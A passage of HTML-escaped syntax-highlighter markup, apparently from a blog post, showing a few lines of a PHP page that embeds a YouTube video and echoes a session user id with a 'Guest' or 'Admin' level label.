!important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;iframe&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-85&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;iframe &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;520&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;293&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;//www.youtube.com/embed/kKS12iGFyEA?rel=0&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;frameborder&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;0&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;allowfullscreen&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;iframe&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-86&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-87&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-88&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;me&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-89&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;echo&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&amp;lt;p&amp;gt;uid : {$_SESSION['uid']}&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;level : &quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-90&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'lvl'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;echo&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Guest&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-91&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'lvl'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;echo&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Admin&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-92&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;echo&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&amp;lt;/p&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) 